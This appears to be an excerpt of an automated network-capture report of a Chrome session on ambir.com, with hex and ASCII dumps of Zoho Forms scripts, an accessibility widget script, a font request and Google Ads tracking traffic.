                                                                                                                                                                                              2024-11-20 20:28:27 UTC4096INData Raw: 72 3d 22 2b 63 6f 6c 6f 72 53 74 72 69 6e 67 2b 27 29 22 3b 27 3b 63 75 73 74 6f 6d 53 74 79 6c 65 54 61 67 2e 61 64 64 52 75 6c 65 28 73 65 6c 65 63 74 6f 72 2c 22 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 2b 69 65 38 46 69 6c 74 65 72 53 74 72 69 6e 67 29 7d 65 6c 73 65 7b 76 61 72 20 69 65 37 46 69 6c 74 65 72 53 74 72 69 6e 67 3d 22 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 67 72 61 64 69 65 6e 74 28 73 74 61 72 74 43 6f 6c 6f 72 73 74 72 3d 22 2b 63 6f 6c 6f 72 53 74 72 69 6e 67 2b 22 2c 65 6e 64 43 6f 6c 6f 72 73 74 72 3d 22 2b 63 6f 6c 6f 72 53 74 72 69 6e 67 2b 22 29 3b 22 3b 63 75 73 74 6f 6d 53 74 79 6c 65 54 61 67 2e 61 64 64 52 75 6c
                                                                                                                                                                                              Data Ascii: r="+colorString+')";';customStyleTag.addRule(selector,"background:transparent;"+ie8FilterString)}else{var ie7FilterString="filter:progid:DXImageTransform.Microsoft.gradient(startColorstr="+colorString+",endColorstr="+colorString+");";customStyleTag.addRul
                                                                                                                                                                                              2024-11-20 20:28:27 UTC4096INData Raw: 63 61 70 74 63 68 61 5f 69 6e 70 75 74 5f 69 64 22 29 29 2c 76 65 72 43 6f 64 65 4a 73 6f 6e 5b 5a 46 4c 69 76 65 43 6f 6e 73 74 61 6e 74 73 2e 56 45 52 49 46 49 43 41 54 49 4f 4e 43 4f 44 45 2e 44 49 47 45 53 54 5d 3d 24 28 69 6e 70 75 74 45 6c 65 6d 29 2e 61 74 74 72 28 5a 46 4c 69 76 65 43 6f 6e 73 74 61 6e 74 73 2e 56 45 52 49 46 49 43 41 54 49 4f 4e 43 4f 44 45 2e 44 49 47 45 53 54 29 2c 76 65 72 43 6f 64 65 4a 73 6f 6e 5b 5a 46 4c 69 76 65 43 6f 6e 73 74 61 6e 74 73 2e 56 45 52 49 46 49 43 41 54 49 4f 4e 43 4f 44 45 2e 43 41 50 54 43 48 41 56 41 4c 5d 3d 24 2e 74 72 69 6d 28 24 28 69 6e 70 75 74 45 6c 65 6d 29 2e 76 61 6c 28 29 29 2c 76 61 6c 75 65 4a 73 6f 6e 5b 24 28 65 6c 65 6d 29 2e 61 74 74 72 28 22 63 6f 6d 70 6e 61 6d 65 22 29 5d 3d 76 65 72
                                                                                                                                                                                              Data Ascii: captcha_input_id")),verCodeJson[ZFLiveConstants.VERIFICATIONCODE.DIGEST]=$(inputElem).attr(ZFLiveConstants.VERIFICATIONCODE.DIGEST),verCodeJson[ZFLiveConstants.VERIFICATIONCODE.CAPTCHAVAL]=$.trim($(inputElem).val()),valueJson[$(elem).attr("compname")]=ver
                                                                                                                                                                                              2024-11-20 20:28:27 UTC4096INData Raw: 72 28 22 6e 61 6d 65 22 29 5d 3d 22 22 3a 22 7a 66 73 2d 6f 74 68 65 72 73 2d 7a 66 73 22 3d 3d 3d 24 28 65 6c 65 6d 6e 65 77 29 2e 76 61 6c 28 29 3f 76 61 6c 75 65 4a 73 6f 6e 5b 24 28 65 6c 65 6d 6e 65 77 29 2e 61 74 74 72 28 22 6e 61 6d 65 22 29 5d 3d 24 28 65 6c 65 6d 29 2e 66 69 6e 64 28 22 69 6e 70 75 74 5b 6e 61 6d 65 3d 61 6c 6c 6f 77 2d 6f 74 68 65 72 73 2d 74 65 78 74 5d 22 29 2e 76 61 6c 28 29 3a 28 76 61 6c 75 65 4a 73 6f 6e 5b 24 28 65 6c 65 6d 6e 65 77 29 2e 61 74 74 72 28 22 6e 61 6d 65 22 29 5d 3d 24 28 65 6c 65 6d 6e 65 77 29 2e 76 61 6c 28 29 2c 66 72 6f 6d 52 65 76 69 65 77 26 26 28 76 61 6c 75 65 4a 73 6f 6e 5b 24 28 65 6c 65 6d 6e 65 77 29 2e 61 74 74 72 28 22 6e 61 6d 65 22 29 5d 3d 24 28 65 6c 65 6d 6e 65 77 29 2e 66 69 6e 64 28 22
                                                                                                                                                                                              Data Ascii: r("name")]="":"zfs-others-zfs"===$(elemnew).val()?valueJson[$(elemnew).attr("name")]=$(elem).find("input[name=allow-others-text]").val():(valueJson[$(elemnew).attr("name")]=$(elemnew).val(),fromReview&&(valueJson[$(elemnew).attr("name")]=$(elemnew).find("


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              85192.168.2.549819141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:26 UTC1874OUTGET /wp-includes/images/blank.gif HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                              Referer: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F53 [TRUNCATED]
                                                                                                                                                                                              2024-11-20 20:28:27 UTC475INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:27 GMT
                                                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                                                              Content-Length: 43
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                              Cf-Polished: status=not_needed
                                                                                                                                                                                              ETag: "5d98a6cb-2b"
                                                                                                                                                                                              Last-Modified: Sat, 05 Oct 2019 14:20:59 GMT
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 13815
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2fbd8a1180d6-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:27 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 f0 00 00 00 00 00 00 00 00 21 f9 04 05 0a 00 00 00 2c 00 00 00 00 01 00 01 00 40 02 02 44 01 00 3b
                                                                                                                                                                                              Data Ascii: GIF89a!,@D;


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              86192.168.2.549821104.22.1.2044431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:27 UTC527OUTGET /apps/app/dist/js/app.js HTTP/1.1
                                                                                                                                                                                              Host: acsbapp.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:27 UTC847INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:27 GMT
                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                              Content-Length: 437268
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              x-goog-generation: 1732031737349367
                                                                                                                                                                                              x-goog-metageneration: 3
                                                                                                                                                                                              x-goog-stored-content-encoding: identity
                                                                                                                                                                                              x-goog-stored-content-length: 437268
                                                                                                                                                                                              x-goog-hash: crc32c=MvisdQ==
                                                                                                                                                                                              x-goog-hash: md5=6FSlj+WLD8tyR4ONBkfNNw==
                                                                                                                                                                                              x-goog-storage-class: STANDARD
                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                              access-control-expose-headers: *
                                                                                                                                                                                              x-guploader-uploadid: AFiumC4U9SlEjhb7sgpmgnsKYslFDuMOZhIm6Ez3fV2dd-5siMr-Q_bYfXfb8iuKNRP2ugYX3iteqWaiWw
                                                                                                                                                                                              expires: Thu, 20 Nov 2025 20:28:27 GMT
                                                                                                                                                                                              Cache-Control: public, max-age=300, must-revalidate
                                                                                                                                                                                              last-modified: Tue, 19 Nov 2024 15:55:37 GMT
                                                                                                                                                                                              etag: "e854a58fe58b0fcb7247838d0647cd37"
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2fbe7878de93-EWR
                                                                                                                                                                                              2024-11-20 20:28:27 UTC522INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 7b 72 65 74 65 6e 74 69 6f 6e 50 65 72 69 6f 64 44 61 79 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 74 2c 64 61 79 73 42 65 66 6f 72 65 4e 6f 74 69 63 65 3a 69 2c 70 72 6f 64 75 63 74 4e 61 6d 65 3a 6e 2c 76 65 72 73 69 6f 6e 3a 73 2c 69 67 6e 6f 72 65 50 61 74 74 65 72 6e 3a 61 7d 29 7b 69 66 28 61 2e 73 6f 6d 65 28 28 65 3d 3e 52 65 67 45 78 70 28 65 29 2e 74 65 73 74 28 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 73 72 63 29 29 29 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 6f 3d 28 2d 31 2a 28 44 61 74 65 2e 6e 6f 77 28 29 2d 74 2d 32 34 2a 65 2a 36 30 2a 36 30 2a 31 65 33 29 2f 38 36 34 65 35 29 2e 74 6f 46 69 78 65 64 28 32 29 3b 6f 3c 3d 69 26 26 6f 3e 3d 30 3f 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e
                                                                                                                                                                                              Data Ascii: !function({retentionPeriodDays:e,timestamp:t,daysBeforeNotice:i,productName:n,version:s,ignorePattern:a}){if(a.some((e=>RegExp(e).test(document.currentScript.src))))return;const o=(-1*(Date.now()-t-24*e*60*60*1e3)/864e5).toFixed(2);o<=i&&o>=0?console.warn
                                                                                                                                                                                              2024-11-20 20:28:27 UTC1369INData Raw: 67 6e 6f 72 65 50 61 74 74 65 72 6e 3a 5b 22 2f 5e 28 3f 21 2e 2a 76 5c 5c 64 2b 5c 5c 2e 5c 5c 64 2b 5c 5c 2e 5c 5c 64 2b 29 2e 2a 2f 22 5d 7d 29 2c 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 33 30 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 29 7b 76 61 72 20 6e 3d 74 68 69 73 26 26 74 68 69 73 2e 5f 5f 76 61 6c 75 65 73 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 2c 69 3d 74 26 26 65 5b 74 5d 2c 6e 3d 30 3b 69 66 28 69 29 72 65 74 75 72 6e 20 69 2e 63 61 6c 6c 28 65 29 3b 69 66 28 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 6c 65 6e 67 74 68 29 72 65 74
                                                                                                                                                                                              Data Ascii: gnorePattern:["/^(?!.*v\\d+\\.\\d+\\.\\d+).*/"]}),(()=>{"use strict";var e={301:function(e,t,i){var n=this&&this.__values||function(e){var t="function"==typeof Symbol&&Symbol.iterator,i=t&&e[t],n=0;if(i)return i.call(e);if(e&&"number"==typeof e.length)ret
                                                                                                                                                                                              2024-11-20 20:28:27 UTC1369INData Raw: 65 22 29 29 2c 75 3d 64 2e 6e 65 78 74 28 29 3b 21 75 2e 64 6f 6e 65 3b 75 3d 64 2e 6e 65 78 74 28 29 29 7b 76 61 72 20 68 3d 75 2e 76 61 6c 75 65 3b 65 2e 70 75 72 69 66 79 49 66 72 61 6d 65 57 69 6e 64 6f 77 28 68 29 7d 7d 63 61 74 63 68 28 65 29 7b 61 3d 7b 65 72 72 6f 72 3a 65 7d 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 75 26 26 21 75 2e 64 6f 6e 65 26 26 28 6f 3d 64 2e 72 65 74 75 72 6e 29 26 26 6f 2e 63 61 6c 6c 28 64 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 61 29 74 68 72 6f 77 20 61 2e 65 72 72 6f 72 7d 7d 65 2e 6f 62 73 65 72 76 65 72 2e 6f 62 73 65 72 76 65 28 74 2e 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2c 7b 63 68 69 6c 64 4c 69 73 74 3a 21 30 2c 73 75 62 74 72 65 65 3a 21 30 7d 29 7d 72 65 74 75 72 6e 20 65 2e 70 75 72 69 66 79 49 66 72 61 6d 65
                                                                                                                                                                                              Data Ascii: e")),u=d.next();!u.done;u=d.next()){var h=u.value;e.purifyIframeWindow(h)}}catch(e){a={error:e}}finally{try{u&&!u.done&&(o=d.return)&&o.call(d)}finally{if(a)throw a.error}}e.observer.observe(t.document.body,{childList:!0,subtree:!0})}return e.purifyIframe
                                                                                                                                                                                              2024-11-20 20:28:27 UTC1369INData Raw: 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 63 2e 61 70 70 6c 79 28 74 68 69 73 2c 65 29 7d 7d 7d 63 61 74 63 68 28 65 29 7b 73 3d 7b 65 72 72 6f 72 3a 65 7d 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 75 26 26 21 75 2e 64 6f 6e 65 26 26 28 61 3d 64 2e 72 65 74 75 72 6e 29 26 26 61 2e 63 61 6c 6c 28 64 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 73 29 74 68 72 6f 77 20 73 2e 65 72 72 6f 72 7d 7d 7d 2c 65 78 74 65 6e 64 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 76 61 72 20 6f 2c 72 2c 6c 3d 69 2e 72 65 66 2c 63 3d 69 2e 74 61 72 67 65 74 52 65 66 2c 64 3d 74 2e 6e 61 6d 65 73 2c 75 3d 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 4e 61 6d 65 2c 68 3d 74 2e 70 6f 73 74 4d 65 74 68 6f 64 2c 70 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 63 5b 75 5d 5b 65 2e 50
                                                                                                                                                                                              Data Ascii: =arguments[t];c.apply(this,e)}}}catch(e){s={error:e}}finally{try{u&&!u.done&&(a=d.return)&&a.call(d)}finally{if(s)throw s.error}}},extendObject:function(t,i){var o,r,l=i.ref,c=i.targetRef,d=t.names,u=t.constructorName,h=t.postMethod,p=function(t){c[u][e.P
                                                                                                                                                                                              2024-11-20 20:28:27 UTC1369INData Raw: 52 65 70 6c 61 63 65 53 74 72 61 74 65 67 69 65 73 2e 65 78 74 65 6e 64 50 72 6f 74 6f 74 79 70 65 57 69 74 68 49 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 2c 69 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 3a 6f 2e 45 76 65 6e 74 44 65 6c 65 67 61 74 6f 72 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 7d 2c 7b 6e 61 6d 65 73 3a 5b 22 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 5d 2c 63 6f 6e 73 74 72 75 63 74 6f 72 4e 61 6d 65 3a 22 57 69 6e 64 6f 77 22 2c 72 65 70 6c 61 63 65 53 74 72 61 74 65 67 79 3a 65 2e 52 65 70 6c 61 63 65 53 74 72 61 74 65 67 69 65 73 2e 65 78 74 65 6e 64 50 72 6f 74 6f 74 79 70 65 57 69 74 68 49 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 2c 69 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 3a 6f 2e 45 76 65 6e 74 44 65 6c 65 67
                                                                                                                                                                                              Data Ascii: ReplaceStrategies.extendPrototypeWithImplementation,implementation:o.EventDelegator.addEventListener},{names:["removeEventListener"],constructorName:"Window",replaceStrategy:e.ReplaceStrategies.extendPrototypeWithImplementation,implementation:o.EventDeleg
                                                                                                                                                                                              2024-11-20 20:28:27 UTC1369INData Raw: 3a 5b 22 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 22 5d 2c 63 6f 6e 73 74 72 75 63 74 6f 72 4e 61 6d 65 3a 22 4e 6f 64 65 22 2c 72 65 70 6c 61 63 65 53 74 72 61 74 65 67 79 3a 65 2e 52 65 70 6c 61 63 65 53 74 72 61 74 65 67 69 65 73 2e 65 78 74 65 6e 64 50 72 6f 74 6f 74 79 70 65 7d 2c 7b 6e 61 6d 65 73 3a 5b 22 72 65 64 75 63 65 22 5d 2c 63 6f 6e 73 74 72 75 63 74 6f 72 4e 61 6d 65 3a 22 41 72 72 61 79 22 2c 72 65 70 6c 61 63 65 53 74 72 61 74 65 67 79 3a 65 2e 52 65 70 6c 61 63 65 53 74 72 61 74 65 67 69 65 73 2e 65 78 74 65 6e 64 50 72 6f 74 6f 74 79 70 65 7d 2c 7b 6e 61 6d 65 73 3a 5b 22 6b 65 79 73 22 2c 22 76 61 6c 75 65 73 22 5d 2c 63 6f 6e 73 74 72 75 63 74 6f 72 4e 61 6d 65 3a 22 4f 62 6a 65 63 74 22 2c 70 6f 73 74 4d 65 74 68 6f 64 3a 66 75 6e 63
                                                                                                                                                                                              Data Ascii: :["parentElement"],constructorName:"Node",replaceStrategy:e.ReplaceStrategies.extendPrototype},{names:["reduce"],constructorName:"Array",replaceStrategy:e.ReplaceStrategies.extendPrototype},{names:["keys","values"],constructorName:"Object",postMethod:func
                                                                                                                                                                                              2024-11-20 20:28:27 UTC1369INData Raw: 6f 72 4e 61 6d 65 3a 22 77 69 6e 64 6f 77 22 2c 72 65 70 6c 61 63 65 53 74 72 61 74 65 67 79 3a 65 2e 52 65 70 6c 61 63 65 53 74 72 61 74 65 67 69 65 73 2e 65 78 74 65 6e 64 50 72 6f 70 65 72 74 79 7d 5d 2c 65 2e 6f 62 73 65 72 76 65 72 3d 6e 65 77 20 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 69 2c 73 2c 61 2c 6f 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 72 3d 6e 28 74 29 2c 6c 3d 72 2e 6e 65 78 74 28 29 3b 21 6c 2e 64 6f 6e 65 3b 6c 3d 72 2e 6e 65 78 74 28 29 29 7b 76 61 72 20 63 3d 6c 2e 76 61 6c 75 65 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 64 3d 28 61 3d 76 6f 69 64 20 30 2c 6e 28 63 2e 61 64 64 65 64 4e 6f 64 65 73 29 29 2c 75 3d 64 2e 6e 65 78 74 28 29 3b 21 75 2e 64 6f 6e 65 3b 75 3d 64 2e 6e
                                                                                                                                                                                              Data Ascii: orName:"window",replaceStrategy:e.ReplaceStrategies.extendProperty}],e.observer=new MutationObserver((function(t){var i,s,a,o;try{for(var r=n(t),l=r.next();!l.done;l=r.next()){var c=l.value;try{for(var d=(a=void 0,n(c.addedNodes)),u=d.next();!u.done;u=d.n
                                                                                                                                                                                              2024-11-20 20:28:27 UTC1369INData Raw: 61 6c 6c 28 74 2c 30 2c 73 29 29 2c 6e 5b 73 5d 3d 74 5b 73 5d 29 3b 72 65 74 75 72 6e 20 65 2e 63 6f 6e 63 61 74 28 6e 7c 7c 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 29 29 7d 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 45 76 65 6e 74 44 65 6c 65 67 61 74 6f 72 3d 76 6f 69 64 20 30 3b 76 61 72 20 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 7d 72 65 74 75 72 6e 20 65 2e 68 61 6e 64 6c 65 45 76 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 61 2c 6f 2c 72 2c 6c 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 63 3d 69 28 65 2e 65 76 65 6e 74 73 29 2c 64 3d 63 2e 6e 65
                                                                                                                                                                                              Data Ascii: all(t,0,s)),n[s]=t[s]);return e.concat(n||Array.prototype.slice.call(t))};Object.defineProperty(t,"__esModule",{value:!0}),t.EventDelegator=void 0;var a=function(){function e(){}return e.handleEvent=function(t){var a,o,r,l;try{for(var c=i(e.events),d=c.ne
                                                                                                                                                                                              2024-11-20 20:28:27 UTC1369INData Raw: 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 21 3d 3d 74 7d 29 29 2c 64 6f 63 75 6d 65 6e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 65 2e 68 61 6e 64 6c 65 45 76 65 6e 74 2c 7b 63 61 70 74 75 72 65 3a 21 30 7d 29 29 29 7d 7d 2c 65 2e 65 76 65 6e 74 73 3d 5b 7b 7d 2c 7b 7d 5d 2c 65 2e 61 63 74 69 76 65 4c 69 73 74 65 6e 65 72 73 3d 5b 5d 2c 65 2e 6e 6f 6e 42 75 62 62 6c 69 6e 67 45 76 65 6e 74 73 3d 5b 22 66 6f 63 75 73 22 2c 22 62 6c 75 72 22 2c 22 66 6f 63 75 73 69 6e 22 2c 22 66 6f 63 75 73 6f 75 74 22 2c 22 63 68 61 6e 67 65 22 5d 2c 65 7d 28 29 3b 74 2e 45 76 65 6e 74 44 65 6c 65 67 61 74 6f 72 3d 61 7d 7d 2c 74 3d 7b 7d 3b 21 66 75 6e 63 74 69 6f 6e 20 69 28 6e 29 7b 76 61 72 20
                                                                                                                                                                                              Data Ascii: .filter((function(e){return e!==t})),document.removeEventListener(t,e.handleEvent,{capture:!0})))}},e.events=[{},{}],e.activeListeners=[],e.nonBubblingEvents=["focus","blur","focusin","focusout","change"],e}();t.EventDelegator=a}},t={};!function i(n){var
                                                                                                                                                                                              2024-11-20 20:28:27 UTC1369INData Raw: 63 72 65 65 6e 2d 72 65 61 64 65 72 20 6d 6f 64 65 20 69 73 20 6f 6e 2c 20 61 6c 74 2b 38 20 74 6f 20 63 61 6e 63 65 6c 22 2c 44 45 4c 45 54 45 44 5f 4e 55 4d 42 45 52 3a 22 57 61 73 22 2c 41 43 43 4f 55 4e 54 3a 22 41 63 63 6f 75 6e 74 22 2c 53 43 52 4f 4c 4c 3a 22 53 63 72 6f 6c 6c 20 50 61 67 65 22 2c 53 45 41 52 43 48 3a 22 53 65 61 72 63 68 22 2c 4f 52 44 45 52 3a 22 4f 72 64 65 72 22 2c 53 55 42 4d 49 54 3a 22 53 75 62 6d 69 74 22 2c 54 49 4d 45 5f 54 4f 5f 41 4c 45 52 54 5f 43 4c 4f 53 45 3a 22 53 65 63 6f 6e 64 73 20 75 6e 74 69 6c 20 63 6c 6f 73 69 6e 67 22 2c 4d 41 49 4e 5f 4d 45 4e 55 3a 22 4d 61 69 6e 20 4d 65 6e 75 22 2c 46 4f 4f 54 45 52 5f 4d 45 4e 55 3a 22 46 6f 6f 74 65 72 20 4d 65 6e 75 22 2c 48 45 41 44 45 52 5f 4d 45 4e 55 3a 22 48 65
                                                                                                                                                                                              Data Ascii: creen-reader mode is on, alt+8 to cancel",DELETED_NUMBER:"Was",ACCOUNT:"Account",SCROLL:"Scroll Page",SEARCH:"Search",ORDER:"Order",SUBMIT:"Submit",TIME_TO_ALERT_CLOSE:"Seconds until closing",MAIN_MENU:"Main Menu",FOOTER_MENU:"Footer Menu",HEADER_MENU:"He


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              87192.168.2.549818108.158.75.294431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:27 UTC581OUTGET /opensans/font.woff HTTP/1.1
                                                                                                                                                                                              Host: webfonts.zohowebstatic.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              Origin: https://forms.zohopublic.com
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                              Referer: https://forms.zohopublic.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              88192.168.2.549820142.250.181.344431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:27 UTC1287OUTGET /pagead/viewthroughconversion/1070729751/?random=1732134501018&cv=11&fst=1732134501018&bg=ffffff&guid=ON&async=1&gtm=45be4bj0v9180601725za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&hn=www.googleadservices.com&frm=0&tiba=Ambir%20Card%20Scanners%20-%20AMBIR%20Technology&npa=0&pscdl=noapi&auid=1093817975.1732134501&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4 HTTP/1.1
